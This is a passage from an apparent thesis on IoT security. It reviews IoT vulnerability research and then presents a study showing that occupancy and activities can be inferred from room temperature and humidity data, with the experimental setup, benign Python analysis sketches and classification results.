The origins of vulnerabilities in IoT objects are often basic design flaws and implementation bugs. Notra et al. [221] showed that popular IoT consumer products communicate with each other in plaintext, and are therefore subject to spoofing and man-in-the-middle attacks. Pa et al. [229] observed a large increase of attacks against IoT devices over the Internet that use the antiquated Telnet protocol. To analyze these attacks, they implemented a honeypot that acted as an IoT object to collect data about Telnet-based intrusions. Implementation bugs in the firmware of IoT devices are an attractive target for attackers, as such bugs might allow the take-over of objects and whole systems. Chen et al. [45] addressed this issue by designing a tool that automatically detects memory corruption bugs in IoT objects. Their tool does not require a firmware image as input but uses the end user’s smartphone app to automatically send commands to the IoT devices while mutating the data fields of these messages. The authors demonstrated the feasibility of their approach by discovering several previously undisclosed memory corruption bugs in a number of IoT consumer products.

Due to the nature of the IoT ecosystem, the root cause of malicious misbehavior in an IoT system might be hard to identify, as such a system usually consists of various devices and applications that are somehow chained together. This leads to a state where audit logs are siloed on several objects and platforms, and therefore, malicious events cannot be easily reconstructed. Wang et al. [306] proposed and evaluated a platform-centric approach that tackles this issue.

In the IoT ecosystem, many objects routinely interact and access each other’s resources. This leads to the threat that over-privileged applications can be misused by malicious entities. Fernandes et al. [91] statically analyzed the source code of hundreds of smart home apps that are associated with a popular smart home system. They revealed design flaws of over-privileged applications as a result of too coarse-grained permissions, as well as the insufficient protection of sensitive information. These security weaknesses can be exploited in security-critical objects, which can seriously affect the residents’ security as they allow for break-ins, vandalism, and robberies of private spaces. Sikder et al. [272] explored the threat that permissions for accessing sensor data of smartphones are often granted by default or only requested once during the installation of an app. However,

sensor data can be misused in various scenarios, e.g., to trigger malware on the device, to exfiltrate data, or to gather sensitive information about the user’s activities. The authors presented an intrusion detection system that observes the usage of sensor data on mobile devices. Although the authors focus on mobile platforms, the presented threats also apply to IoT objects in general. Jia et al. [145] also discussed the threat of design flaws in the permission models of IoT platforms that are controlled with mobile device apps. This threat arises from the fact that users make uninformed decisions during installation, as well as being forced at runtime to make security-related decisions without being informed about the essential context of these decisions. This allows malicious apps to interfere with the users’ IoT objects. The authors proposed a new framework that resolves these issues by providing users with context-rich information such that they can make informed access control decisions. Sivaraman et al. [274] described the threat of a malware-equipped mobile device app that searches for vulnerable IoT objects within the local home network. This way, the attacker can circumvent the “isolation” of the residential IoT objects behind the home router, which usually does not translate the private IP addresses of smart home devices into public IP addresses. Relying on this “isolation”, many smart home devices communicate unprotected within the local network, with the consequence that this communication is vulnerable to malware-infected mobile devices within the same network.

The vast majority of IoT objects communicate wirelessly. Thus, the over-the-air data transmissions are also attractive targets for attacks. Kim et al. [152] formally evaluated the impact of DoS attacks on IoT protocols, such as Sigfox, LoRa, JPAKE, MQTT, and CoAP. They concluded that the majority of IoT protocols are vulnerable to DoS attacks, which could lead to massive disruptions of IoT systems. Shreenivas et al. [269] discussed security threats in the routing of wireless low-power networks and presented an intrusion detection system to protect against such attacks. Due to the properties of wireless communication, this ubiquitous medium is hard to manage and control, and attackers have easy access to it. Siby et al. [270] proposed the concept of a passive system for monitoring the wireless traffic generated by IoT objects. Using this system, one should be able to identify the present IoT objects as well as communicating parties and patterns, which should also enable the detection of malicious events within wireless networks.

In Chapter 5, we present a case study in which the security of a popular smart home standard for IoT consumer products is analyzed. The results show that we can take over IoT objects wirelessly, as the specific standard lacks comprehensive security measures and proves to be insecure by design.

Chapter 3

Privacy Implications of Room Climate Data

IoT applications collect, store, and process massive amounts of data to enable their “smart” capabilities. Although this data collection is required for proper function, there is also a potential for misuse when collected data can be accessed by unauthorized parties or is used for unintended purposes. In this chapter, we present a case study on the threat of data leakage that focuses on the privacy implications of room climate data.

Contents

3.1 Introduction
3.2 Threat Model
3.3 Experimental Design and Methods
    3.3.1 Experimental Setup and Tasks
    3.3.2 Sensor Data Collection
    3.3.3 Experimental Procedure
    3.3.4 Participants and Ethical Principles
    3.3.5 Classifier Design
3.4 Results
    3.4.1 Visual Inspection
    3.4.2 Occupancy Detection
    3.4.3 Occupancy Estimation
    3.4.4 Activity Recognition
    3.4.5 Multi-Sensor Classification
3.5 Further Observations
    3.5.1 Length of Measurement Windows
    3.5.2 Selected Features
    3.5.3 Size and Layout of Rooms
    3.5.4 Position of Sensors
3.6 Discussion
    3.6.1 Privacy Implications
    3.6.2 Location-Independent Classification
    3.6.3 Policy Implications
3.7 Related Work on Occupancy Detection and Activity Recognition
3.8 Conclusion


3.1 Introduction

The vision of the IoT is to enhance work processes, energy efficiency, and living comfort by interconnecting actuators, mobile devices, and sensors. These networks of embedded technologies enable applications such as smart heating, home automation, and smart metering, among many others. Sensors are of crucial importance in these applications. Data gathered by sensors is used to represent the current state of the environment; for instance, in smart heating, sensors measure the room climate. Using this information and a user-defined configuration of the targeted room climate, the application regulates heating, ventilation, and air conditioning.

While the collection of room climate data is obviously essential to enable smart heating, it may at the same time impose the risk of privacy violations. Consequently, it is commonly believed among security experts that leaking room climate data may result in privacy violations and hence that the data needs to be cryptographically protected [78]. However, these claims have not been supported by scientific evidence so far. Thus, one could question whether in practice additional effort for protecting the data would be justified.

The current situation with room climate data is comparable to the area of smart metering [119, 319, 142, 164]. In 1989, Hart [119] was the first to draw attention to the fact that smart metering appliances can be exploited as surveillance devices. Since then, research has shown far-reaching privacy violations through fine-granular power consumption monitoring, ranging from the detection of occupancy and everyday activities [207] up to recognizing which program a TV was displaying [112]. Various techniques have been proposed over the years to mitigate the privacy risks of smart metering [39, 246, 143, 319, 245]. This issue has become such a grave concern that the German Federal Office for Information Security published a protection profile for smart meters in 2014 [85]. By considering the privacy implications of smart heating, we hope to initiate consumer protection research and policy debate in this area, analogous to the developments in smart metering described above.

In this chapter, we investigate room climate data from the perspective of possible privacy violations. More precisely, we address the following research questions:

• Occupancy detection: Can an attacker determine the presence of a person in a room using only room climate data, i.e., temperature and relative humidity?

• Occupancy estimation: Can an attacker determine the number of persons present in a room using only this room climate data?

• Activity recognition: Can an attacker recognize activities of the occupant in the room using only the temperature and relative humidity data?

Our threat scenario targets buildings with multiple rooms that are similar in size, layout, furnishing, and positions of the sensors. These properties are typical for office buildings, dormitories, cruise ships, and hotels, among others. Assuming that an attacker is able to train a classifier that recognizes pre-defined activities, possible privacy violations are,

e.g., tracking the presence and working practices of employees in offices, or the disclosure of lifestyle and intimate activities in private spaces. All these situations present intrusions into the privacy of the occupants. In contrast to surveillance cameras and motion sensors, the occupant does not expect to be monitored. Also, legal restrictions regarding privacy might apply to surveillance cameras and motion sensors but not to room climate sensors.

To evaluate these threats, we present experiments that consider occupancy detection, occupancy estimation, and activity recognition based on the analysis of room climate data from a privacy perspective. We measured room climate data in three office-like rooms and distinguished between the activities reading, standing, walking, and working on a laptop. The data was collected from sensors that measure temperature and relative humidity at a regular time interval of a few seconds. Reflecting the most restrictive scenario, we analyzed how much information can be derived from the measurements of a single sensor only. Although in smart heating applications most likely only one sensor per room will be installed, each room was equipped with several sensors in order to evaluate the impact of the position of the sensor in the room. Additionally, we combined and evaluated data from two sensors simultaneously to investigate whether increasing the available data affects classification noticeably.

In our procedure, occupants performed a pre-defined sequence of tasks in the experimental space. In sum, we collected almost 115 hours of room climate sensor data from a total of 36 participants. The collected room climate data was analyzed using an off-the-shelf machine learning classification algorithm.

Evaluating our collected room climate data, the attacker detects the presence of a person with detection rates of up to 93.5%, depending on the location and the sensor position, which is significantly higher than guessing (50%). Discriminating between one and two persons present in the room is not a similarly easy task for the attacker, as classification results are not above 68% and some are around 48%, which is in the region of guessing (50%). Consequently, differentiating between absence, the presence of one, and of two persons yields results lying in between these two, with rates of up to 72.2%. The attacker can distinguish between four activities (reading, standing, walking, and working on a laptop) with detection rates of up to 56.8%, which is also significantly better than guessing (25%). We can also distinguish between three activities (sitting, standing, and walking) with detection rates of up to 81.0%, as opposed to 33.3% if guessing. Furthermore, we distinguish between standing and walking with detection rates of up to 96.3%. Additionally, evaluating the performance of pairs of sensors predominantly shows an increase of detection rates. However, the exact difference fluctuates from almost none to approximately 10%. Thus, we show that the fears of privacy violations through leaked room climate data are well justified. Furthermore, we analyze the influence of the room size, the positions of the sensors, and the amount of measured sensor data on the accuracy. In summary, we provide the first steps in verifying the common belief that room climate data leaks privacy-sensitive information.

The remainder of this chapter is organized as follows. Section 3.2 presents the threat model considered in this work. In Section 3.3, we introduce the experimental design and

methods. The results and complementary observations of our experiments are presented and discussed in Sections 3.4 to 3.6, respectively. In Section 3.7, we give an overview of related work. We draw conclusions in Section 3.8.

3.2 Threat Model

The overall goal of our work is to understand the potential privacy implications if room climate data is accessed by an attacker. The attacker’s goal is to gain information about the state of occupancy, i.e., if and how many persons are present in the room, as well as the activity of the occupants without their consent.

Obviously, the more information an attacker can gather, the more likely she can deduce privacy-harming information from the measurements. However, in practice only few sensors will be installed within one room, especially as one sensor node per room is sufficient to monitor the room climate, and these sensors will measure a very limited set of data only. Therefore, we base our analysis on an attacker model that considers a room climate system where only few sensor nodes are used and only basic data is measured. That is, the main focus of our experiments will be on the case that only one single sensor is present. If it turns out that a single sensor already provides sufficient data to derive privacy-harming information about the occupants, the situation may get even worse when more sensors are accessible. To examine this, we will also consider the case that an attacker can make use of the measurements of two different sensors to analyze if and how much better the attacker performs compared to the one-sensor case.

In our threat model, we assume that this sensor node takes only the two most basic measurements, temperature and relative humidity. These data are the fundamental properties to describe room climate. Note that this restriction is in contrast to existing work (cf. Table 3.7 and Section 3.7) that based its experiments on more types of measurements or used data that is less common to characterize room climate.

We consider a sensor system that measures the climate of a room, denoted as the target location. At the target location, temperature and relative humidity sensors are installed that report the measured values at regular intervals to a central database. We consider an attacker model where the attacker has access to this database and aims to derive information about the occupants at the target location. Furthermore, we assume that the attacker has access to either the target location itself, or to rooms similar in size, layout, sensor positions, and furniture. Such situations are given, for example, in office buildings, hotels, cruise ships, and student dormitories. This location, denoted as the training location, is used to train the classifier, i.e., a machine learning algorithm that learns from the input data labeled with the ground truth. As the attacker has full control over the training location, she can freely choose what actions take place during the measurements. For example, she could take measurements while no persons are present at the training location, or while some persons are present and execute predefined activities.


There are various scenarios in which an attacker has incentives to collect and analyze room climate data. For example, the management of a company aims at observing the presence and working practices of employees in the offices. In another case, a provider of private spaces (hotels, dormitories, etc.) wants to disclose lifestyle and intimate activities in these spaces. This information may be utilized for targeted advertising or sold to insurance companies. In any case, the evaluation of room climate data provides the attacker with the possibility to undermine the privacy of the occupants.

The procedure of these attacks is as follows: First, the attacker collects training data at a training location, which might be the target location or other rooms similar in size, layout, sensor positions, and furniture. The attacker also records the ground truth for all events that shall be distinguished. Examples of events are the number of persons present in the room (including the case that the room is empty), or different activities such as working, walking, and sleeping. The training data is recorded with a sample rate of a few seconds and split into windows (i.e., a temperature curve and a relative humidity curve) of the same time length, usually one to three minutes. Using the collected training data, the attacker trains a machine learning classifier. After the classifier is trained, it can be used to classify windows of climate data from the target location to determine the events. The classifier works on previously collected data, thus reconstructing past events, and also on live-recorded data, thus determining current events “on-the-fly” at the target location.
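As a minimal sketch of the first two steps of this procedure, the snippet below segments a labeled recording into fixed-length, overlapping windows that can be handed to a classifier. It assumes the measurements are available as a pandas DataFrame with columns time (in seconds), temperature, humidity, and a ground-truth label; the column names and window parameters (taken from Section 3.3.5) are illustrative, not the exact implementation used in this work.

    import pandas as pd


    def split_into_windows(df: pd.DataFrame, window_s: int = 180, step_s: int = 30):
        """Segment a recording into fixed-length, overlapping measurement windows.

        Windows whose measurements span more than one ground-truth label are
        discarded, mirroring the exclusion rule described in Section 3.3.5.
        """
        windows = []
        start, end = df["time"].min(), df["time"].max()
        while start + window_s <= end:
            win = df[(df["time"] >= start) & (df["time"] < start + window_s)]
            if len(win) > 0 and win["label"].nunique() == 1:
                windows.append(win)
            start += step_s
        return windows


    # Usage: windows from the training location (with labels) train the classifier;
    # windows from the target location are then classified to reconstruct events.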

3.3 Experimental Design and Methods

We conducted a study to investigate the feasibility of detecting and estimating occupancy as well as inferring activities in an office environment from temperature and relative humidity. From March to April 2016, we performed experiments at two locations simultaneously, Location A and Location B, with a distance of approximately 200 km between them. In addition, from January to February 2017, we conducted further experiments at a third location, denoted as Location C, which is located in the same building as Location B.

3.3.1 Experimental Setup and Tasks

The experimental spaces at the three locations are different in size, layout, and positions of the sensors. Thus, each target location is also the training location in our study. At Location A, the room has a floor area of 16.5 m² and was equipped with room climate sensors at four positions as shown in Figure 3.1ii. At Location B, the room has a floor area of 30.8 m², i.e., roughly twice as much as at Location A, and had room climate sensors installed at three positions as illustrated in Figure 3.1i. Location C has a floor area of 13.9 m² and was equipped with room climate sensors at five positions as shown in Figure 3.1iii. In all locations, the room climate sensors measured temperature and relative humidity. The number of deployed sensors varied due to limitations of hardware availability.


Figure 3.1: Floor plans of the experiment spaces including sensor node locations; h indicates the node's height. (i) Location B (30.8 m², sensors B1-B3), (ii) Location A (16.5 m², sensors A1-A4), (iii) Location C (13.9 m², sensors C1-C5).

Our goal was to determine to what extent the presence and activities of occupants influence the room climate data. Therefore, we measured temperature and relative humidity during phases of absence as well as phases of presence. If occupants were present, these persons had to perform one task or a sequence of tasks. We defined the following experimental tasks (see also Figure 3.2):

• Read: Sit on an office chair next to a desk and read.
• Stand: Stand in the middle of the room, try to avoid movements.
• Walk: Walk slowly and randomly through the room.
• Work: Sit on an office chair next to a desk and use a laptop, which is located on the desk.


Figure 3.2: The defined tasks (a) Read, (b) Stand, (c) Walk, and (d) Work, performed by participants at Location A.

To eliminate confounding factors, we defined location default settings applying to all locations. Essentially, all windows were required to remain closed, and no person was allowed in the room when it was not in use for the experiment. The rooms have radiators for heating, which were adjusted to a constant level. At Locations A and B, we used shutters fixed in positions that provided enough light for reading and working.

3.3.2 Sensor Data Collection

We used a homogeneous hardware and software setup at all locations for data collection, which is described in the following.

Hardware. At each location, we set up a sensor network consisting of several Moteiv Tmote Sky sensor nodes with an integrated IEEE 802.15.4-compliant radio [216] as well as an integrated temperature and relative humidity sensor. The nodes have the Contiki operating system [68] version 2.7 installed. In addition, we deployed a webcam that took pictures at a 3-second interval at Location A. These were used for verification during the data collection phase only and were not given to the classification algorithms.

Software. For sensor data collection, we customized the Collect-View application included in Contiki 2.7, which provides a graphical user interface to manage the sensor network. For our purposes, we implemented an additional control panel offering a customized logging system. The measurement settings of the Collect-View application were set to a report interval of 4 seconds with a variance of 1 second, i.e., each sensor node reported its current values in a time interval of 4 ± 1 seconds. The variance is a feature provided by Collect-View to decrease the risk of packet collisions during over-the-air transmissions.
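The effect of the randomized report interval can be illustrated with a short simulation. The sketch below is purely illustrative (it is not Contiki or Collect-View code): it draws report timestamps with a 4 ± 1 s spacing for two nodes and counts how often their transmissions would fall within a small collision window, compared to a fixed 4 s interval.

    import random


    def report_times(duration_s: float = 600.0, base_s: float = 4.0, jitter_s: float = 1.0):
        """Generate report timestamps spaced by base_s +/- jitter_s seconds."""
        t, times = 0.0, []
        while t < duration_s:
            t += base_s + random.uniform(-jitter_s, jitter_s)
            times.append(t)
        return times


    def near_collisions(a, b, window_s: float = 0.05) -> int:
        """Count pairs of reports from two nodes that fall within window_s seconds."""
        return sum(1 for ta in a for tb in b if abs(ta - tb) < window_s)


    random.seed(0)
    jittered = near_collisions(report_times(), report_times())
    fixed = near_collisions(report_times(jitter_s=0.0), report_times(jitter_s=0.0))
    print(f"near-simultaneous reports: with jitter {jittered}, without jitter {fixed}")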

Collected Data. We structured data collection in units and aimed for a good balance between presence and absence as well as the different tasks among all units, as this is needed for the later analysis using machine learning. Each unit has a fixed time duration,

t, where exactly one or two persons were present (t ∈ {10, 30, 60}, in minutes) who executed predefined activities. In the presence of two occupants, both performed the same activities simultaneously, which allows us to investigate whether it is possible to distinguish the number of persons in a room. If the presence time was t minutes, then the absence time before and after it, respectively, was determined as t/2 + 5 minutes, where 5 minutes served as buffer. This accounts both for the roughly equal distribution of presence time and absence time, and for the fact that temperature and humidity settle within a 15-minute period after the 60-minute presence of one person. In Section 3.3.3, we present a detailed description of the experimental procedure.

Overall, we collected around 115 hours of sensor data, 66 hours with at least one person being present. A more extensive overview of the amount of measured sensor data is shown in Table 3.1. To encourage replication and further investigations, all collected sensor data is available as open data sets on GitHub.¹

Table 3.1: Measured sensor data of all locations (recorded time in hours).

Variable               Value   Location A   Location B   Location C
Occupancy              0       20:38:26     15:21:00     13:21:42
                       1       14:41:56     11:33:06     13:44:29
                       2       14:51:05     11:41:22     -
Task (one occupant)    Read    4:46:13      2:56:44      3:19:47
                       Stand   2:45:27      2:34:20      3:28:27
                       Walk    2:43:53      2:37:12      3:20:05
                       Work    4:03:33      3:00:20      3:20:52
Task (two occupants)   Read    4:26:43      2:58:43      -
                       Stand   2:51:08      2:37:11      -
                       Walk    2:43:23      2:38:20      -
                       Work    4:27:57      2:58:24      -
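To make the unit timing concrete, a small helper can compute the schedule implied by the t/2 + 5 rule described above; the function is a worked example, not part of the actual measurement tooling.

    def unit_schedule(presence_min: int) -> dict:
        """Absence padding and total duration of one experimental unit.

        The absence time before and after a presence phase of t minutes is
        t/2 + 5 minutes, with 5 minutes serving as a settling buffer.
        """
        absence_min = presence_min / 2 + 5
        return {
            "absence_before_min": absence_min,
            "presence_min": presence_min,
            "absence_after_min": absence_min,
            "total_min": presence_min + 2 * absence_min,
        }


    for t in (10, 30, 60):
        print(t, unit_schedule(t))
    # For t = 60 this yields 35 min absence, 60 min presence, 35 min absence (130 min in total).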

3.3.3 Experimental Procedure

The participants were assigned to at least one experimental unit with fixed presence times and tasks, and provided with a script for their actions (that is, for how long and in which order the tasks should be performed). Every participant performed each unit twice, with the same tasks, but possibly on different days and in a permuted chronological order. Tasks were performed in blocks of 10, 20, or 30 minutes. Thus, 10-minute units contained only one task of 10 minutes; 30-minute units consisted of either three tasks of 10 or one

¹ https://github.com/IoTsec/Room-Climate-Datasets

task of 10 plus one of 20 minutes; 60-minute units were composed of either two tasks of 20 plus two of 10, or one task of 10, 20, and 30 minutes each. At the beginning of the presence time of each unit, i.e., the time period where one or two persons had to be present, the experimental supervisor unlocked the room door to let the participants in. The participants started with the first task and were instructed by phone (at Locations A and C) or through the glass pane (at Location B) when it was time to change activities or to leave the room.
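The composition of units from task blocks can be expressed compactly; the following sketch picks one of the valid block compositions listed above and assigns tasks to the blocks at random. It is an illustration only: in the actual study, the task sequence of each unit was prescripted and repeated by the same participant.

    import random

    # Valid task-block compositions (in minutes) for each unit length, as described above.
    UNIT_COMPOSITIONS = {
        10: [[10]],
        30: [[10, 10, 10], [10, 20]],
        60: [[20, 20, 10, 10], [10, 20, 30]],
    }

    TASKS = ["Read", "Stand", "Walk", "Work"]


    def build_unit(presence_min: int, rng: random.Random) -> list[tuple[str, int]]:
        """Choose one valid block composition and assign a task to each block."""
        blocks = list(rng.choice(UNIT_COMPOSITIONS[presence_min]))
        rng.shuffle(blocks)
        return [(rng.choice(TASKS), length) for length in blocks]


    rng = random.Random(42)
    print(build_unit(60, rng))  # one randomly composed 60-minute unit of four or three blocks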

3.3.4 Participants and Ethical Principles

For participating in the experiment, 14 subjects volunteered at Location A, 12 subjects at Location B, and 10 subjects at Location C as shown in Table 3.2.

Table 3.2: Demographic data of participants; µ denotes the average, σ denotes the standard deviation.

Characteristic        Location A   Location B   Location C
Gender (female)       3            2            5
Gender (male)         11           10           5
Weight [kg]   µ       74.9         81.7         63.1
              σ       8.0          12.1         10.0
Height [cm]   µ       175.9        178.4        170.7
              σ       9.2          5.3          9.3
Age           µ       33.7         30.3         25.6
              σ       8.2          4.8          2.8

Demographic data of participants was collected in order to facilitate replication and future experiments. All subjects provided written informed consent after the study protocol was approved by the data protection office.² We assigned each participant to a random ID. All collected sensor data as well as the demographic data is only linked to this ID.

3.3.5 Classifier Design

We used classification to predict occupancy and activities in the rooms. We adopt an approach that has successfully been used in several applications of biosignal processing, namely extraction of a number of statistical descriptors with subsequent feature selection [144, 133].

² Ethical review boards at both locations only consider medical experiments.


The features use measurements from short time windows. We experimented with windows of different lengths, namely 60 s, 90 s, 120 s, 150 s, and 180 s. The offset between two consecutive windows was set to 30 s. We excluded all windows where only a part of the measurements belongs to the same activity.

The feature set was composed of a number of statistical descriptors that were computed on the temperature and humidity measurements within these windows. These are the mean value, variance, skewness, kurtosis, number of nonzero values, entropy, difference between the maximum and minimum value of the window (i.e., value range), correlation between temperature and humidity, and mean and slope of the regression line for the measurement window before the current window. Additionally, we subtracted from the measurements their least-square linear regression line and computed all of the listed statistics on the subtraction residuals. Feature selection was performed using a sequential forward search [311, Ch. 7.1 & 11.8], with an inner leave-one-subject-out cross-validation [120, Ch. 7] to determine the performance of each feature set.

For classification, we used the Naïve Bayes classifier. To avoid a bias in the results, we randomly selected identical numbers of windows per class for training, validation, and testing. For the implementation, we used the ECST software [247], which wraps the WEKA library [115]. As performance measures, we use accuracy (i.e., the number of correctly classified windows divided by the number of all windows) and per-class sensitivity (i.e., the number of correctly classified windows for a specific class divided by the number of all windows of this class). Classification accuracy was deemed statistically significant if it was significantly higher than random guessing, which is the best choice if the classifier could not learn any useful information during training. For each experiment, a binomial test with significance level p < 0.01 was carried out using the R software [238].

Note that neither the features nor the rather simple Naïve Bayes classifier are particularly tailored to predicting privacy leaks. However, we show that even such an unoptimized system is able to correctly predict occupancy and action types and hence produce privacy leaks. Higher detection rates can be expected if more advanced classifiers are applied to this task.
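As a simplified, self-contained sketch of such a pipeline, the following code computes a subset of the listed descriptors per window, performs forward feature selection, and evaluates a Naïve Bayes classifier with a leave-one-subject-out split. It uses scikit-learn instead of the ECST/WEKA toolchain referenced above, implements only part of the feature set, and replaces the inner leave-one-subject-out validation with a plain 3-fold split, so it should be read as an approximation of the described setup rather than the actual implementation.

    import numpy as np
    from scipy.stats import skew, kurtosis
    from sklearn.feature_selection import SequentialFeatureSelector
    from sklearn.model_selection import LeaveOneGroupOut, cross_val_score
    from sklearn.naive_bayes import GaussianNB
    from sklearn.pipeline import make_pipeline


    def window_features(temp: np.ndarray, hum: np.ndarray) -> np.ndarray:
        """Statistical descriptors of one window (subset of those listed above)."""
        feats = []
        for x in (temp, hum):
            idx = np.arange(len(x))
            detrended = x - np.polyval(np.polyfit(idx, x, 1), idx)  # remove linear trend
            for series in (x, detrended):
                feats += [series.mean(), series.var(), skew(series),
                          kurtosis(series), series.max() - series.min()]
        feats.append(np.corrcoef(temp, hum)[0, 1])  # temperature-humidity correlation
        return np.asarray(feats)


    def evaluate(windows, labels, subjects) -> float:
        """Leave-one-subject-out accuracy of Naive Bayes with forward feature selection.

        windows: list of (temperature, humidity) arrays, one pair per window;
        labels: ground-truth class per window; subjects: participant ID per window.
        """
        X = np.vstack([window_features(t, h) for t, h in windows])
        y, groups = np.asarray(labels), np.asarray(subjects)
        clf = make_pipeline(
            SequentialFeatureSelector(GaussianNB(), direction="forward", cv=3),
            GaussianNB(),
        )
        scores = cross_val_score(clf, X, y, cv=LeaveOneGroupOut(), groups=groups)
        return scores.mean()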

3.4 Results

In this section, we present the experimental results. First, a visual inspection of the collected data is presented, followed by the machine learning-aided occupancy detection and estimation, and activity recognition using one or two sensors.

3.4.1 Visual Inspection

We started our evaluation by analyzing the raw sensor data. To this end, we implemented a visualization script in MATLAB, which plots this data. The visualizations of two measurements are depicted as examples in Figure 3.3.


Figure 3.3: Visualization of two examples of room climate measurements (temperature and relative humidity over time). (a) An occupant is present for 60 minutes at Location A (Sensor A1; tasks Stand, Read, Walk, Read, Walk). (b) An occupant is present for 60 minutes at Location B (Sensor B2; tasks Stand, Work, Walk). The grey background indicates the presence of the occupant in the experimental space.

The visualizations show an immediate rise of the temperature and humidity as soon as an occupant enters the room. Furthermore, variations in temperature and humidity increase rapidly and can be clearly seen. Thus, one can visually distinguish between phases of occupancy and non-occupancy. One can also notice different patterns during the performance of the tasks. As Figure 3.3a shows, an occupant walking in the experimental space causes a constant increase of temperature and humidity with only small variations. In contrast, an occupant standing in the room causes the largest variations of humidity compared to the other defined tasks (cf. Figure 3.3b). The effects of the tasks reading and working on temperature and humidity in the depicted figures are very similar: both variables tend to increase, showing medium variations. For further analysis of the data, we used machine learning as outlined in Section 3.3.5.


3.4.2 Occupancy Detection

Occupancy detection describes the binary detection of occupants in the experimental space based on features from windows with a length of 180 seconds (cf. Section 3.3.5). This is a two-class task, namely to distinguish whether an occupant is present (true) or not (false). We only considered training and testing data within the same room (but separated training and testing data both by the days and the participants of the acquisition). We randomly selected the same number of positive and negative cases from the data. Thus, simply guessing the state has a success probability of 50%. However, our classification results are considerably higher than that. Table 3.3 shows that the highest accuracies per location were 93.5% (Location A), 88.5% (Location B), and 91.0% (Location C). Considering all sensors of all three locations, detection accuracy ranges between 66.8% (Sensor B3) and 93.5% (Sensor A1), as shown in Figure 3.4a. All classification accuracies were statistically significantly different from random guessing. This indicates that an attacker can reveal the presence of occupants at a target location with a high probability.

Table 3.3: Classification accuracy for occupancy detection.

Scenario     Sensor   Occup. [%]   No Occup. [%]   Guess [%]   Accuracy [%]
Occupancy    A1       94.1         93.0            50.0        93.5
             A2       94.5         85.0            50.0        89.7
             A3       92.0         76.4            50.0        84.2
             A4       77.8         79.1            50.0        78.4
             B1       91.9         85.1            50.0        88.5
             B2       85.3         77.2            50.0        81.3
             B3       69.7         63.9            50.0        66.8
             C1       92.9         89.2            50.0        91.0
             C2       89.9         87.4            50.0        88.6
             C3       90.0         82.0            50.0        86.0
             C4       89.8         87.6            50.0        88.7
             C5       92.5         88.8            50.0        90.7

Notation: 'Occup.' - sensitivity for class occupancy, 'No Occup.' - sensitivity for class no occupancy, 'Guess' - probability of correct guessing, 'Accuracy' - classification accuracy

3.4.3 Occupancy Estimation

Results for detecting multiple persons are shown in Table 3.4. Here, we first restate the results for deciding whether a single person is in a room or not, denoted as "0-1 person?". Then, we report the results for deciding whether one or two persons are in a room, denoted as "1-2 persons?". In the third column, we report results on the joint classification problem, denoted as "0-1-2 persons?". While the first two columns cover two-class classification tasks (i.e., with a guessing chance of 50%), the third column covers a three-class classification task (with a guessing chance of 33.3%). Decisions whether a room is empty or occupied by a single person achieve relatively high accuracies, for some sensors close to or even above 90%. However, the decision between one and two persons is much harder. At Location A, three out of four sensors perform around guessing chance, whereas at Location B, performances range between 60% and 70%. The three-class task confirms these two initial results, lying between the well-discernible case of an empty room and the much harder case of determining the exact number of occupants. From an attacker's perspective, deciding whether one or two persons are present in a target location is an ambiguous task.

Table 3.4: Occupancy detection and estimation accuracies for two- and three-class tasks at Locations A and B.

Sensor   0-1 Person? [%]   1-2 Persons? [%]   0-1-2 Persons? [%]
A1       93.5              47.7               59.7
A2       89.7              47.8               58.7
A3       84.2              68.0               66.4
A4       78.4              48.2               54.9
B1       88.5              67.6               72.2
B2       81.2              60.7               60.3
B3       66.8              67.3               56.6

3.4.4 Activity Recognition

Activity recognition reports the current activity of an occupant in the experimental space. The four activity tasks are described in Section 3.3.1. The recognition results for these tasks are shown in Figure 3.4.

Activity4 classifies between the activities Read, Stand, Walk, and Work. As shown in Figure 3.4b, the accuracy of recognizing activities achieved by the machine learning pipeline ranged from 23.9% (Sensor C1) to 56.8% (Sensor A1). Overall, the accuracy of Activity4 was statistically significantly better than the probability of guessing the correct task (25%) for 8 out of 12 sensors. Thus, the distinction between multiple activities is possible, but depends on the target location and the position of the sensor.

In the next step, we investigated whether an attacker can increase the recognition accuracies by distinguishing between a smaller set of activities. To this end, we combined two tasks into a meta task, e.g., the tasks Read and Work became Sit. The model Activity3 classifies between the tasks Sit, Stand, and Walk. The probability of correct guessing is thus 33.3%. This model typically represents the activities of an occupant in a private space or an office room. For Activity3, the achieved accuracy ranged from 31.8% (Sensor C1) to 81.0% (Sensor A1). Our results were statistically significant for 10 out of the 12 sensors deployed in the three locations. Assuming a known layout of the target location, the attacker might be able to determine the position of the occupant in the space and infer activities such as watching TV, exercising, cooking, or eating.

Figure 3.4: Classification accuracy for occupancy detection and activity recognition: (a) Occupancy, (b) Activity4 (read, stand, walk, work), (c) Activity3 (sit, stand, walk), (d) Activity2 (sit, upright), (e) Activity2a (read, work), (f) Activity2b (stand, walk). In each diagram, the guessing probability is plotted as a line. Each symbol represents the accuracy that we achieved with a single sensor. A circle marks a statistically significant result, while an 'x' represents a statistically insignificant result.

The model Activity2 classifies between the tasks Sit and Upright, where Sit, as before, combines Read and Work, and Upright combines Stand and Walk. In this classification, the attacker distinguishes the posture of an occupant. The model Activity2a classifies between the tasks Read and Work, and the model Activity2b classifies between the tasks Stand and Walk. Activity2a indicates that an attacker can even distinguish between sedentary activities, such as reading a book or working on a laptop. In contrast, Activity2b shows that an attacker can differentiate between standing and moving activities.


Thus, an attacker can detect movements at the target location. For Activity2, Activity2a, and Activity2b, the probability of guessing the correct class is 50%. Using these models, the attacker can infer various work and life habits. For Activity2, the accuracy varied between 54.6% (Sensor C2) and 82.1% (Sensor A1), and all accuracies are statistically significant. For Activity2a, the lowest and highest accuracies were 54.2% (Sensor B3) and 76.6% (Sensor C2), respectively, which resulted in statistically significant results for 11 out of 12 sensors. For Activity2b, the achieved accuracy ranged from 53.3% (Sensor C4) to 95.1% (Sensor A1), and the results for 10 out of 12 sensors were statistically significant.
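The significance statements above compare each accuracy against the respective guessing probability. As an illustration only, the sketch below uses a one-sided binomial test on the number of correctly classified windows; this is a common choice for such comparisons and not necessarily the exact test used in this evaluation, and the window count in the example is hypothetical.

```python
# Illustrative check of whether a classifier beats guessing: one-sided binomial
# test on the number of correct predictions (assumed approach, see text above).
from scipy.stats import binomtest

def beats_guessing(n_correct: int, n_total: int, p_guess: float, alpha: float = 0.05):
    result = binomtest(n_correct, n_total, p=p_guess, alternative="greater")
    return result.pvalue < alpha, result.pvalue

# Example: 82.1% accuracy on a hypothetical 400 test windows of a two-class task
# (guessing chance 50%).
print(beats_guessing(int(0.821 * 400), 400, 0.5))
```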

3.4.5 Multi-Sensor Classification

